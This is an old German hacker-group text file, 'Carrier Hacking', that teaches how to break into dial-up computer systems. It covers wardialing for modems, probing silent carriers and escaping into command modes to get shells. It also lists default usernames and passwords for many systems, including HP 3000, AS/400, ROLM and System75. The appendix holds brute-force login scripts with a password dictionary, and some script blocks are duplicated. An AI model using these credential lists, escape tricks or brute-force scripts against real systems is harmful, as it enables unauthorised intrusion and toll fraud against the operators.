[oweals/thc-archive.git] / Papers / carriers.txt

\r
\r
\r
\r
                              CARRIER HACKING\r
\r
                                 by Giemor\r
\r
\r
\r
\r
\r
\r
Warum Carrier Scanning/Hacking\r
------------------------------\r
\r
In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA \r
sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.\r
Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.\r
Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet\r
und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,\r
IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich\r
dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,\r
FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...\r
Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder\r
nicht-oeffentliche in die man sich social-engineered) einloggen und mit\r
Kumpels leicht Software austauschen oder man versucht herauszufinden, was\r
sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt. \r
\r
\r
\r
Wie findet man Carriers\r
-----------------------\r
\r
Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.\r
(thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten \r
Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes\r
finden kann, uns aber speziell hier die gefundenen Modems interessieren.\r
Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity, \r
data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und \r
schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem\r
ausgibt in einer Logdatei speichert.\r
Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,\r
da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.\r
\r
\r
\r
Was sind Silent Carriers\r
------------------------\r
\r
Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System\r
muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,\r
oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch\r
eingestellt. \r
a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.\r
   die meisten Systeme benutzten 8N1, 7E1 und 7O1.\r
b) aendert die Terminal emulation: \r
   \r
   IBM 3101                    TV 910              BEEHIVE ATL078\r
   IBM PC/FTTERM COLOR         LS ADM3A            UDT01\r
   IBM PC/FTTERM MONO          ADDS VP             UDT02\r
   IBM 3161/62/63              HAZEL 1500          UDT03\r
   IBM 3151                    HAZEL ESP I         UDT04\r
   IBM 3164                    HAZEL ESP II        UDT05\r
   VT52                        NT DISPLAY          ANSI\r
   VT100                       TT 5410             ANSI-BBS\r
   VT220                       TT 5420\r
   FALCO 500                   HP 2621B            Qmodem Pro unterstuetzt\r
   WYSE 50                     DG D210                diese Emulationen \r
                                              \r
c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal\r
   Programm unterstuetzt.\r
d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks, \r
e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,\r
   und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am\r
   besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.\r
f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e\r
   versagt ;-)\r
   \r
\r
\r
Ich habe ein System gefunden\r
----------------------------\r
\r
Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.\r
Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.\r
Dann kann man z.B. alle standart Accounts durchprobieren.\r
Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte\r
man deren Produkte oder Mitarbeiter Namen als login und Password\r
versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force \r
Hacking uebrig. Man probiert mit einem programm alle moeglichen \r
Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man\r
macht das an einem System wo man endlos eingabe versuche hat. Ein gutes\r
Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige\r
System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript\r
gibts dazu im Anhang.\r
\r
\r
\r
Suspend/Command Modus\r
---------------------\r
\r
Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter\r
etc. etc. - nur haben sie vielleicht etwas uebersehen :\r
Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft\r
noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim\r
Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"\r
die Verbindung weiter benutzen kann. Andere Programme lassen sich in den\r
Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)\r
Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+\r
sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).\r
Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so\r
einen Command modus bietet oder das System was einen das Programm suspenden\r
laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,\r
also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche\r
Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.\r
einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk\r
abscannen oder sogar hacken.\r
\r
\r
\r
Sonderfall: Internet\r
--------------------\r
\r
Besonders interessant sind Rechner die am Internet angeschlossen sind.\r
Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen\r
hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem\r
Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet\r
in den Host oder das Netzwerk hineinzukommen.\r
Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)\r
die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und\r
darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.\r
Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder\r
traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder\r
aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist\r
die Finger davon lassen.\r
\r
-------------------------------capture----------------------------------------\r
CONNECT 14400/ARQ/MNP5\r
Trying ...\r
Connected to 192.354.24.5\r
Escape character is '^]'.\r
\r
UNIX(r) System V Release 4.0 (sisy500)\r
\r
Login:\r
-------------------------------capture----------------------------------------\r
\r
\r
\r
Systeme mit standart Accounts\r
-----------------------------\r
\r
------------------------------------------------------------------------------\r
DECserver Communications Server\r
\r
DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1\r
\r
Local -010- Session 1 to ZYNET1 established\r
\r
Login:\r
PASSWORD:\r
\r
Local -011- Session 1 disconnected from ZYNET1\r
hello>\r
\r
Standart Accounts:\r
------------------\r
ACCESS\r
SYSTEM\r
\r
Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2\r
------------------------------------------------------------------------------\r
Xyplex Terminal Server.\r
\r
Enter username> \r
Local> \r
  \r
Standart Accounts:\r
------------------\r
ACCESS\r
SYSTEM\r
------------------------------------------------------------------------------\r
\r
Annex Command Line Interpreter  *  Copyright 1991 Xylogics, Inc\r
\r
Checking authorization, Please wait...\r
Annex username:                  (Enter your NCI userid)\r
Annex password:                  (Enter your NCI password)\r
Permission granted\r
Annex:\r
\r
Befehl   Parameter                     Beschreibung\r
---------------------------------------------------\r
?        ? []                          :Hilfe\r
bg       bg [-dq] [%][%,+,-,,]         :Eine Aktion in Hintergrund setzen\r
fg       fg [-q] [%][%,+,-,,]          :zurueck zu einer aktuellen Aktion\r
hangup   hangup [-q]                   :Auflegen und Port reseten\r
help     help []                       :Hilfe\r
jobs     jobs                          :Zeigt aktuelle Aktionen an\r
kill     kill [%][%,+,-,,]...          :Kille eine Aktion\r
stty     stty [parameter [value]]...   :Show/Set Annex Port Parameter\r
telnet   telnet [-rsst] [ [port]]      :Starte Telnet Connection\r
who      who [[-l] []@ ...]            :Zeigt System User\r
\r
Standart accounts:\r
------------------\r
guest     guest\r
------------------------------------------------------------------------------\r
\r
ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
Login: ?\r
Valid login modes are:\r
SYSADMIN,\r
TECH,\r
POLL.\r
Login:tech\r
Password:tech\r
ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
Copyright (C) ROLM Systems 1991\r
All Rights Reserved.\r
Aktion:\r
\r
       ( Mit den Befehl "?" oder help kommt man zum folgenden menue)\r
\r
               The following commands are valid:\r
  Activate <session #>         - Activate the session\r
  Broadcast                    - Broadcast a message to all terminals\r
  Connect <subsystem> <node #> - Invoke the subsystem\r
  Terminate <session #>        - Terminate the session\r
  List                         - List all open sessions\r
  Logout                       - Terminate all sessions and log off.\r
  Login <login mode>           - Logout and login again.\r
  Display                      - Display sessions status on a site.\r
  TechView <on/off>            - Enable/Disable TechView training.\r
------------------------------------------------------------------\r
Beschreibung aus TFC05:\r
\r
ActivatePM       :    Starts the Phone Mail system.\r
AssignClasses    :    External program to assign COS to each user in the\r
                      database. Only local non-Call Processing users are\r
                      assigned classes.\r
BackupDataBase   :    Create a backup of the customer database on HD or\r
                      floppies.\r
BackupNames      :    Copies name header information for all subscribers to\r
                      a floppy/floppies.\r
CallProcessing   :    An external program to create and maintain Mailbox\r
                      Profiles.\r
ChannelTrace     :    Lists the current state of each channel. Continously\r
                      updates until interrupted.\r
DeactivatePM     :    Turn off PM system. DON'T USE THIS UNLESS YOU ARE\r
                      VERY SURE OF WHAT YOU ARE DOING! Calls will no\r
                      longer be taken by the PM if it is deactivated.\r
DList            :    Show distribution lists.\r
FFormat          :    Format a floppy disk. The single most useless command\r
                      for a remote user.\r
LogOff           :    Quit session and go to session manager menu.\r
MonitorLogon     :    Monitor users logging in to PM.\r
MonitorTapLink   :    Shows tap traffic on CBX integrated systems. Continues\r
                      to update until interrupted.\r
OCConfigAndTest  :    Utility to configure and test all outcalling\r
                      related parameters.\r
Profile          :    Add All Clear Delete Fix List Modify Purge\r
Reports          :    Display reports.\r
CallActivity     :    Displays call activity by the hour, with averages.\r
\r
Standart accounts\r
-----------------\r
sysadmin  sysadmin\r
operator  operator\r
poll      poll oder tech\r
tech      tech oder operator\r
\r
Info:\r
Eine genaue Beschreibung ueber dieses System giebt es in TFC #5\r
------------------------------------------------------------------------------\r
\r
ROLM CBX II\r
\r
ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568\r
BIND DATE:  7/APR/93\r
COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.\r
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.\r
YOU HAVE ENTERED CPU 1\r
12:38:47 ON WEDNESDAY 2/15/1995\r
\r
USERNAME: op\r
\r
PASSWORD:\r
\r
 INVALID USERNAME-PASSWORD PAIR\r
\r
Standart Accounts:\r
------------------\r
op              op\r
op              operator\r
su              super\r
admin           pwp\r
eng             engineer\r
------------------------------------------------------------------------------\r
\r
ARC NetBlazer Version 2.1\r
ARC-login:\r
\r
Standart Accounts:\r
------------------\r
test\r
setup\r
remote\r
snmp\r
MAV\r
------------------------------------------------------------------------------\r
\r
Telebit's NetBlazer Version 2.0x5\r
netblzr2 login:\r
\r
Standart Accounts:\r
------------------\r
test\r
setup\r
remote\r
snmp\r
MAV\r
------------------------------------------------------------------------------\r
\r
IFG's VAX 8650\r
\r
%SECURE-I-NET, Incoming number logged by Secure-net\r
\r
Username: \r
Password:\r
Welcome to VAX 8650\r
$\r
\r
Standart Accounts:\r
------------------\r
Vax\r
Vms\r
Dcl\r
Demo\r
Test\r
Help\r
News\r
Guest\r
Decnet\r
Systest\r
Uetp\r
Default\r
User\r
Field\r
Service\r
System\r
Manager\r
Operator\r
------------------------------------------------------------------------------\r
HP 3000\r
\r
MPE XL:\r
MPE XL:HELLO\r
Expected [session name,] user.acct [,group]. (CIERR 1424)\r
MPE XL:hello mgr.sys\r
ENTER ACCOUNT (SYS) PASSWORD:\r
ENTER ACCOUNT (SYS) PASSWORD:\r
ENTER ACCOUNT (SYS) PASSWORD:\r
\r
Standart Accounts:\r
------------------\r
HELLO           MANAGER.SYS\r
HELLO           MGR.SYS\r
HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP\r
HELLO           OP.OPERATOR\r
MGR             CAROLIAN\r
MGR             CCC\r
MGR             CNAS\r
MGR             CONV\r
MGR             COGNOS\r
OPERATOR        COGNOS\r
MANAGER         COGNOS\r
OPERATOR        DISC\r
MGR             HPDESK\r
MGR             HPWORD\r
FIELD           HPWORD\r
MGR             HPOFFICE\r
SPOOLMAN        HPOFFICE\r
ADVMAIL         HPOFFICE\r
MAIL            HPOFFICE\r
WP              HPOFFICE\r
MANAGER         HPOFFICE\r
MGR             HPONLY\r
FIELD           HPP187\r
MGR             HPP187\r
MGR             HPP189\r
MGR             HPP196\r
MGR             INTX3\r
MGR             ITF3000\r
MANAGER         ITF3000\r
MAIL            MAIL\r
MGR             NETBASE\r
MGR             REGO\r
MGR             RJE\r
MGR             ROBELLE\r
MANAGER         SECURITY\r
MGR             SECURITY\r
FIELD           SERVICE\r
MANAGER         SYS\r
MGR             SYS\r
PCUSER          SYS\r
RSBCMON         SYS\r
OPERATOR        SYS\r
OPERATOR        SYSTEM\r
FIELD           SUPPORT\r
OPERATOR        SUPPORT\r
MANAGER         TCH\r
MAIL            TELESUP\r
MANAGER         TELESUP\r
MGR             TELESUP\r
SYS             TELESUP\r
MGE             VESOFT\r
MGE             VESOFT\r
MGR             WORD\r
MGR             XLSERVER\r
\r
Ein Login Hacker Script gibt es im Anhang\r
------------------------------------------------------------------------------\r
\r
System75\r
\r
Login: root\r
INCORRECT LOGIN\r
\r
Login: browse\r
Password:\r
\r
Software Version: G3s.b16.2.2\r
\r
Terminal Type (513, 4410, 4425): [513]\r
\r
Standart Accounts:\r
------------------\r
bcim            bcimpw\r
bciim           bciimpw\r
bcms            bcmspw, bcms\r
bcnas           bcnspw\r
blue            bluepw\r
browse          looker, browsepw\r
craft           crftpw, craftpw, crack\r
cust            custpw\r
enquiry         enquirypw\r
field           support\r
inads           indspw, inadspw, inads\r
init            initpw\r
kraft           kraftpw\r
locate          locatepw\r
maint           maintpw, rwmaint\r
nms             nmspw\r
rcust           rcustpw\r
support         supportpw\r
tech            field\r
------------------------------------------------------------------------------\r
AIX\r
\r
IBM AIX Version 3 for RISC System/6000\r
(C) Copyrights by IBM and by others 1982, 1990.\r
login:\r
\r
Standart Accounts:\r
------------------\r
guest     guest\r
------------------------------------------------------------------------------\r
\r
AS/400\r
\r
UserID?\r
Password?\r
\r
Standart Accounts:\r
------------------\r
qsecofr         qsecofr\r
qsysopr         qsysopr\r
qpgmr           qpgmr     \r
ibm             password\r
ibm             2222\r
ibm             service\r
qsecofr         1111111\r
qsecofr         2222222\r
qserv           qserv\r
qsvr            qsvr\r
secofr          secofr\r
qsrv            ibmce1\r
------------------------------------------------------------------------------\r
\r
\r
Systeme ohne Standart Accounts\r
------------------------------\r
\r
CDC Cyber\r
\r
WELCOME TO THE NOS SOFTWARE SYSTEM.\r
COPYRIGHT CONTROL DATA 1978, 1987.\r
\r
88/02/16. 02.36.53. N265100\r
CSUS CYBER 170-730.                     NOS 2.5.2-678/3.\r
FAMILY:\r
\r
You would normally just hit return at the family prompt.  Next prompt is:\r
\r
USER NAME:\r
------------------------------------------------------------------------------\r
\r
Cisco Router\r
\r
cisco_router_1>                        (kann jeder beliebige Promt sein)\r
cisco_router_1>LOGIN\r
Username:\r
Password:\r
------------------------------------------------------------------------------\r
\r
GTN\r
\r
WELCOME TO CITIBANK. PLEASE SIGN ON.\r
XXXXXXXX\r
\r
@\r
PASSWORD =\r
\r
@\r
\r
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r
\r
PLEASE ENTER YOUR ID:-1->\r
PLEASE ENTER YOUR PASSWORD:-2->\r
\r
CITICORP (CITY NAME). KEY GHELP FOR HELP.\r
  XXX.XXX\r
 PLEASE SELECT SERVICE REQUIRED.-3->\r
------------------------------------------------------------------------------\r
\r
Lantronix Terminal Server\r
\r
Lantronix ETS16 Version V3.1/1(940623)\r
\r
Type HELP at the 'Local_15> ' prompt for assistance.\r
\r
Login password>\r
------------------------------------------------------------------------------\r
\r
NIH Timesharing\r
\r
NIH Tri-SMP 7.02-FF  16:30:04 TTY11\r
system 1378/1381/1453 Connected to Node Happy(40) Line # 12\r
Please LOGIN\r
.\r
------------------------------------------------------------------------------\r
\r
VM/ESA ONLINE\r
\r
                                          TBVM2 VM/ESA Rel 1.1     PUT 9200\r
\r
Fill in your USERID and PASSWORD and press ENTER\r
(Your password will not appear when you type it)\r
USERID   ===>\r
PASSWORD ===>\r
\r
COMMAND  ===>\r
------------------------------------------------------------------------------\r
\r
\r
\r
ANHANG:\r
\r
Login Hacker Scripts:\r
---------------------\r
\r
[BEGIN hp_mpe.txt]\r
;\r
;\r
; ------------------------------------------------------------------------\r
;  HP MPE-XL      : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)\r
; ------------------------------------------------------------------------\r
;\r
;\r
; MPE XL:\r
; EXPECTED A :HELLO COMMAND. (CIERR 6057)\r
; MPE XL: hello\r
; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)\r
;\r
; \r
=============================================================================\r
#DEFINE\r
PHONE_NR=*\r
LOGFILE=*.log\r
DIAL_TRIES=100\r
LOGIN_TRIES=0\r
DIC(1)=hp_mpe_a.dic\r
; uncomment command lines below to check for 6 more common MPE passwords\r
\r
#NOCARRIER\r
LOG(CARRIER LOST on $DATE at $TIME)\r
\r
LOG()\r
GOTO(1)\r
\r
#START\r
LOG(--------------------------------------------------------------------------)\r
LOG( TARGET : $PHONE_NR )\r
LOG( DATE : $DATE )\r
LOG( TIME : $TIME )\r
LOG()\r
LOG_SESSION_ON\r
SET D_TMP=1\r
SET S_TMP=X\r
\r
:1\r
SET STRING=X\r
DIAL\r
WAIT(1)\r
IF STRING~XL THEN GOTO(2)\r
WAIT4STRING(2,^M,6,GOTO(1),XL)\r
\r
:2\r
SET STRING=X\r
\r
SEND_(HELLO )\r
IF D_TMP=1 THEN SEND_(ADVMAIL.)\r
IF D_TMP=2 THEN SEND_(FIELD.)\r
IF D_TMP=3 THEN SEND_(MAIL.)\r
IF D_TMP=4 THEN SEND_(MANAGER.)\r
IF D_TMP=5 THEN SEND_(MGE.)\r
IF D_TMP=6 THEN SEND_(MGR.)\r
IF D_TMP=7 THEN SEND_(OP.)\r
IF D_TMP=8 THEN SEND_(OPERATOR.)\r
IF D_TMP=9 THEN SEND_(PCUSER.)\r
IF D_TMP=10 THEN SEND_(RSBCMON.)\r
IF D_TMP=11 THEN SEND_(SPOOLMAN.)\r
IF D_TMP=12 THEN SEND_(SYS.)\r
IF D_TMP=13 THEN SEND_(WP.)\r
\r
IF S_TMP=X THEN SEND_NEXT_DIC(1)\r
IF S_TMP=Y THEN SEND_DIC(1)\r
IF S_TMP=Z THEN SEND_DIC(1)\r
IF S_TMP=A THEN SEND_DIC(1)\r
; IF S_TMP=B THEN SEND_DIC(1)\r
; IF S_TMP=C THEN SEND_DIC(1)\r
\r
IF D_TMP=13 THEN SET S_TMP=X\r
IF D_TMP=13 THEN SET D_TMP=1\r
WAIT(1)\r
; set this higher if the system response is slow\r
IF STRING2~HELLO THEN GOTO(3)\r
IF STRING2~exists THEN GOTO(3)\r
IF STRING2~on-ex THEN GOTO(4)\r
IF STRING2~ASSW THEN GOTO(5)\r
WAIT(2)\r
IF STRING2~HELLO THEN GOTO(3)\r
IF STRING2~exists THEN GOTO(3)\r
IF STRING2~on-ex THEN GOTO(4)\r
IF STRING2~ASSW THEN GOTO(5)\r
GOTO(1)\r
\r
:3\r
INC(D_TMP)\r
GOTO(2)\r
\r
:4\r
SET S_TMP=X\r
SET D_TMP=1\r
\r
:5\r
IF S_TMP=Z THEN GOTO(6)\r
IF S_TMP=A THEN GOTO(7)\r
;IF S_TMP=B THEN GOTO(8)\r
;IF S_TMP=C THEN GOTO(9)\r
SET S_TMP=Z\r
LOG_($DIC(1))\r
SEND_DIC(1)\r
WAIT(1)\r
LOG_(HPOnly)\r
SEND(HPOnly)\r
WAIT(1)\r
LOG_(HP)\r
SEND(HP)\r
WAIT(2)\r
GOTO(1)\r
\r
:6\r
SET S_TMP=A\r
LOG_(MPE)\r
SEND(MPE)\r
\r
LOG_(Manager)\r
SEND(Manager)\r
WAIT(1)\r
LOG_(mgr)\r
SEND(mgr)\r
WAIT(2)\r
GOTO(1)\r
\r
:7\r
SET S_TMP=X\r
; SET S_TMP=B\r
LOG_(remote)\r
SEND(remote)\r
WAIT(1)\r
LOG_(TeleSup)\r
SEND(TeleSup)\r
WAIT(1)\r
LOG_(operator)\r
SEND(operator)\r
WAIT(2)\r
GOTO(1)\r
\r
\r
; SET S_TMP=C\r
; LOG_(tech)\r
; SEND(tech)\r
; WAIT(1)\r
; LOG_(mail)\r
; SEND(mail)\r
; WAIT(1)\r
; LOG_(hpoffice)\r
; SEND(hpoffice)\r
; WAIT(2)\r
; GOTO(1)\r
\r
; :9\r
; SET S_TMP=X\r
; LOG_(sys)\r
; SEND(sys)\r
; WAIT(1)\r
; LOG_(security)\r
; SEND(security)\r
; WAIT(1)\r
; LOG_(support)\r
; SEND(support)\r
; LOG_(hpoffice)\r
; SEND(hpoffice)\r
; WAIT(2)\r
; GOTO(1)\r
\r
; :9\r
; SET S_TMP=X\r
; LOG_(sys)\r
; SEND(sys)\r
; WAIT(1)\r
; LOG_(security)\r
; SEND(security)\r
; WAIT(1)\r
; LOG_(support)\r
; SEND(support)\r
\r
; GOTO(1)\r
\r
:100\r
LOG()\r
LOG( END OF : $PHONE_NR )\r
LOG(--------------------------------------------------------------------------)\r
#END\r
[END]\r
\r
\r
\r
[BEGIN hp_mpe_a.dic]\r
CAROLIAN\r
CCC\r
CNAS\r
COGNOS\r
CONV\r
DISC\r
HP\r
HPDESK\r
HPOFFICE\r
HPONLY\r
HPP187\r
HPP189\r
HPP196\r
HPUNSUP\r
HPWORD\r
INTX3\r
ITF3000\r
MAIL\r
NETBASE\r
OPERATOR\r
REGO\r
RJE\r
ROBELLE\r
HPP187\r
HPP189\r
HPP196\r
HPUNSUP\r
HPWORD\r
INTX3\r
ITF3000\r
MAIL\r
NETBASE\r
OPERATOR\r
REGO\r
RJE\r
ROBELLE\r
SERVICE\r
SUPPORT\r
SYS\r
SYSTEM\r
TCH\r
TELESUP\r
VESOFT\r
WORD\r
XLSERVER\r
[END]\r
\r
\r
[BEGIN silent.txt]\r
;\r
;\r
; ------------------------------------------------------------------------\r
;  Silent Dialups : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)\r
; ------------------------------------------------------------------------\r
;\r
; Silent Dialups : No output/response from dialup modem\r
;                  (both types, 30 sec hangup & unlimited)\r
;\r
; (takes approx. 9-10 hours)\r
;\r
; \r
=============================================================================\r
#DEFINE\r
PHONE_NR=####\r
LOGFILE=####\r
DIAL_TRIES=50\r
LOGIN_TRIES=0\r
BRUTE(1)=^$,1,1,3\r
; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.\r
\r
#NOCARRIER\r
CHECK4OUTPUT(OFF)\r
LOG(CARRIER LOST on $DATE at $TIME)\r
\r
LOG()\r
LOG()\r
GOTO(1)\r
\r
#START\r
LOG(--------------------------------------------------------------------------)\r
LOG( TARGET : $PHONE_NR )\r
LOG( DATE : $DATE )\r
LOG( TIME : $TIME )\r
LOG()\r
LOG_SESSION_ON\r
\r
:1\r
DIAL\r
WAIT(1)\r
CHECK4OUTPUT(99)\r
\r
:2\r
SEND_NEXT_BRUTE(1)\r
WAIT_(255)\r
;waits 255ms between every attempt\r
GOTO(2)\r
CHECK4OUTPUT(99)\r
\r
:2\r
SEND_NEXT_BRUTE(1)\r
WAIT_(255)\r
;waits 255ms between every attempt\r
GOTO(2)\r
\r
:99\r
CHECK4CARRIER(OFF)\r
WAIT(5)\r
CHECK4CARRIER(#NOCARRIER)\r
\r
:100\r
HANGUP\r
BEEP\r
BEEP\r
BEEP\r
LOG()\r
LOG()\r
LOG( FOUND : $BRUTE(1))\r
LOG(--------------------------------------------------------------------------)\r
#END\r
[END]\r
\r
\1a